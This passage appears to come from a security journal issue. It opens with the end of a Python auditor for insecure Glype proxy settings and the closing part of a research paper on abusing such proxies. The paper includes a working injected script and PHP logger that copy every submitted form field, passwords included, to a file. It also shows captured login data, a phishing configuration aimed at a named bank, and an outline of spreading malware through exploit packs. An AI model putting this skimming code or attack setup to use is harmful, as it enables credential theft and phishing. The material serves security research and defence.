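$CONFIG['admin_password'] = 'f7c3bc1d808e04732adf679965ccc34ca7ae3441';  // placeholder, not md5('admin')
"""


def php_value(raw: str):
    """Convert the right-hand side of a PHP assignment into a Python value."""
    raw = raw.strip()
    if raw.lower() in ("true", "false"):
        return raw.lower() == "true"
    m = QUOTED_RE.fullmatch(raw)
    if m:
        return m.group(1).replace("\\'", "'").replace("\\\\", "\\")
    m = re.fullmatch(r"array\((.*)\)", raw, re.S)
    if m:
        return QUOTED_RE.findall(m.group(1))
    return raw   # e.g. $CONFIG['tmp_dir'] . 'cookies/' is kept as text, not evaluated


def parse_settings(text: str) -> dict:
    """Collect $CONFIG assignments from a settings.php fragment."""
    config = {}
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            config[m.group("key")] = php_value(m.group("value"))
    return config


def audit(config: dict) -> list:
    """Return one finding per setting that enables the attacks described in the paper."""
    findings = []
    if config.get("ssl_warning") is False:
        findings.append("ssl_warning=false: certificate errors on proxied HTTPS sites are hidden from users")
    if config.get("stop_hotlinking") is False:
        doms = ", ".join(config.get("hotlink_domains") or []) or "any"
        findings.append(f"stop_hotlinking=false: proxy links can be planted in e-mail and pages (hotlink_domains: {doms})")
    if config.get("cookies_on_server") is True:
        findings.append(f"cookies_on_server=true: users' cookies are written to {config.get('cookies_folder', '<unset>')}")
    if config.get("enable_logging") is True:
        findings.append("enable_logging=true: client IPs and visited URLs are written to the log folder")
    for key in ("header_include", "footer_include"):
        val = config.get(key)
        if isinstance(val, str) and re.search(r"<\s*(script|iframe)", val, re.I):
            findings.append(f"{key}: <script>/<iframe> markup is injected into every proxied page")
    for key, val in config.items():
        if isinstance(val, str) and val.lower() == DEFAULT_ADMIN_MD5:
            findings.append(f"{key}: value is md5('admin'), the default admin credential")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_SETTINGS), ("hardened", HARDENED_SETTINGS)):
        print(name, audit(parse_settings(text)) or ["no findings"])
```

Matching the default-credential hash by value rather than by key name means the check keeps working whatever a given Glype version calls the setting; the rest of the audit is the paper's attack configuration read back as a checklist.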
As hotlinking is allowed and the Glype proxy presents no message, the attacker can also take a Glype proxy URL that points at the bank's domain and embed it in phishing emails distributed to a large number of users. When a user clicks the malicious link, he or she is redirected to the Glype proxy interface, which automatically loads the legitimate bank website. An attacker can also install a Glype proxy on a familiar-looking domain name to make the phishing attack look more appealing, and hence more effective.

Listing 5: Injecting code into the Glype proxy's footer_include parameter

// – – – – Code (1): hook every form and post its fields to the attacker's logger – – – –
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit(function() {
  var yup = $("form").serialize();              // every field of every form on the page, passwords included
  $.post("logit.php", yup, function(data) {});  // send a copy to the proxy host before the real submit goes out
});
</script>';

// – – – – Code (2): the same hook, but it only displays the captured fields (useful for testing) – – – –
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit(function() {
  alert($("form").serialize());
});
</script>';

// – – – – Code (3): logit.php, the server-side logger that Code (1) posts to; appends each POST to postlog.txt – – – –
<?php
$file = fopen("postlog.txt", 'a');
foreach ($_POST as $key => $value) {
    fwrite($file, $key . ":" . $value . "\n");  // one key:value pair per line
}
fclose($file);
?>

Listing 6: Data extracted from an HTTP POST (form submit) request

lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg

Malware distribution

Glype proxies can be used to attack corporate networks and spread infections. Given the characteristics of a Glype proxy, an attacker can build an embedded toolkit around it to distribute highly targeted malware. The complete model is presented below.

Hosting the Glype proxy: to begin, the attacker hosts the Glype proxy on a compromised domain. As described earlier, web searching reveals a number of misconfigured Glype proxies on the Internet, and it is not difficult for an attacker to take over a misconfigured proxy and use it for malicious purposes. Once a proxy is installed on the compromised domain, the attacker configures it for the attack using the scenarios described in the earlier sections. There are two primary configuration settings the attacker wants in place:
• Logging, which allows the attacker to keep track of the activity passing through the proxy. For example, the attacker can install a custom POST logger plugin to steal the data in HTTP POST requests.
• IP filtering, which allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This is useful for targeted infections.

Embedding a browser exploit pack in Glype: after the Glype proxy is installed, the next step is to embed an iframe whose URL points to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated as required. A BEP is a framework that bundles a number of exploits together: it begins by fingerprinting the user's browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs frequently used for infections. It is also possible to embed a single exploit directly in the Glype proxy web page.
This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically into every proxied web page for stealthy infection; the aim is to exploit the user's browser when a proxied web page is opened. Additionally, many proxy users believe that surfing anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link that points to a BEP is not a hard task in a Glype proxy.

Figure 1: Stealing credentials by injecting code in a Glype proxy.

Listing 7: Configuration parameters required for bypassing XFS and executing phishing

// Disable SSL warnings
$CONFIG['ssl_warning'] = false;
// Allow hotlinking
$CONFIG['stop_hotlinking'] = false;
// Hotlink domain setting, pointed at the target domain
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
// Store cookies on the server
$CONFIG['cookies_on_server'] = true;
// Cookie storage path
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
// Enable logging
$CONFIG['enable_logging'] = true;

Figure 2: Phished web page in a Glype proxy.

Advertising the Glype proxy: once the Glype proxy-based attack is set up, the next step is to advertise the proxy. Advertising is usually done to collect revenue based on hits, but here the attacker's prime motivation is traffic, so that the infectious code is distributed widely; advertising therefore plays a critical role in the success of the attack. Attackers use several methods to advertise their infected Glype proxies:
• Public proxy lists. These are one of the most widely used methods for advertising Glype proxies. For example, paying a few dollars gets an infected Glype proxy listed among the top ten proxies, which is a good deal from the attacker's perspective because it increases traffic to the infected proxy. Figure 3 shows how a proxy can be advertised.
• Phishing. Attackers use phishing attacks to distribute the URL of their infected Glype proxy. Phishing has been effective at exploiting users' trust in the security of proxies.
• Social networks, message boards and advertising links. Due to their popularity and perceived trustworthiness, social networks have become attackers' preferred channel for distributing malware: it is easy and profitable.
On completion of this process, the attacker has distributed information about the infected Glype proxy to a variety of outlets on the Internet, and then waits for the infections to trigger.

Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack.
If the user is directed to a malicious website loaded with malware, the BEP there installs malware on the user's computer and the attacker owns the machine. If the Glype proxy is being used to gather information, the attacker starts mining the logs to track IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful for designing other attacks; for example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely.

Proactive steps

There are several steps users can take when dealing with Glype proxies for anonymous surfing on the Internet:
• Avoid public proxy services for websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is passing through a public proxy. A classic example is employees circumventing restrictions put in place by the organisation they work for; such circumvention can open a big hole.
• There are legitimate and authentic proxy services on the Internet, but it is still not advisable to use them without checking. A user should verify the integrity of a proxy provider to establish whether it is a legitimate service or a fraudulent entity.
• When a Glype proxy is deployed for internal use, ensure that it is configured securely. Default credentials must be changed to strong ones, and log files must not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server.
• Develop good surfing habits. For example, always think twice before clicking a link embedded in an email, and be suspicious of attachments and verify them before downloading. These operational habits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour.
The steps above can be effective in reducing the infection rate and preserving users' integrity.

Conclusion

Glype proxies have been increasing in popularity over the past few years. Generally, they assist in maintaining a user's integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in information theft. Second, attackers can extend the Glype proxy code to conduct web-based attacks by tricking a user into visiting a malicious domain or routing web traffic through Glype proxies. Finally, security depends greatly on users' ability to make secure decisions on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely.

Figure 3: Advertising proxies on the Internet.

About the authors

Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB.

Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings.

Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US), where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python, 'The Practice of Computing Using Python, Second Edition', published by Addison-Wesley in 2012.

References

1. Glype proxy. Accessed Nov 2012. www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/firefox/addon/proxilla/.
3. Powers, JL. 'Tracking Malware with Public Proxy Lists'. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/malicious/tracking-malware-public-proxy-lists_33604.
4. Brozycki, Z. 'Detecting and Preventing Anonymous Proxy Usage'. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/detection/detecting-preventing-anonymous-proxy-usage_32943.
5. 'TOR (The Onion Router)'. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/lsait/admin/TOR%20Routing%20Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. 'Talking to Yourself for Fun and Profit'. Accessed Nov 2012. www.w2spconf.com/2011/papers/websocket.pdf.
7. 'When You Think You Surf Anonymously But You Don't'. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. 'Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites'. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/framebusting/framebust.pdf.
10. Sood, AK; Enbody, RJ. 'Frametrapping the framebusting defence'. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/article/pii/S1353485811701052.
11. Sood, AK; Enbody, RJ. 'Browser Exploit Packs – Exploitation Tactics'. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot.com/2011/06/toorcon-seattle-2011-browser-exploit.html.

Virtual jihad: how real is the threat?

Steve Gold, freelance journalist

There is widespread concern about the ways in which terrorist organisations – and particularly jihadist movements – may be using the Internet to organise and execute acts of terror. But is the threat real, or is it a case of an IT security industry generating fear, uncertainty and doubt in an attempt to instil fear into every Internet user?

One of the less well reported aspects of cybercrime – and one that poses a very real threat to the integrity of companies' IT resources, as well as that of Western governments – is the issue of cyber-terrorism. According to Dancho Danchev, an Amsterdam-based security blogger with Webroot and an Internet security researcher since the mid-1990s, the reason for this is largely a lack of understanding of what cyber-jihadism is all about. Coupled with a lack of understanding of the teachings of the Koran and the Islamic faith, this has resulted in the topic becoming something of a no-go area for Western security researchers, despite the fact that the more extremist elements in Islamic countries are increasingly using relatively advanced technology in the shape of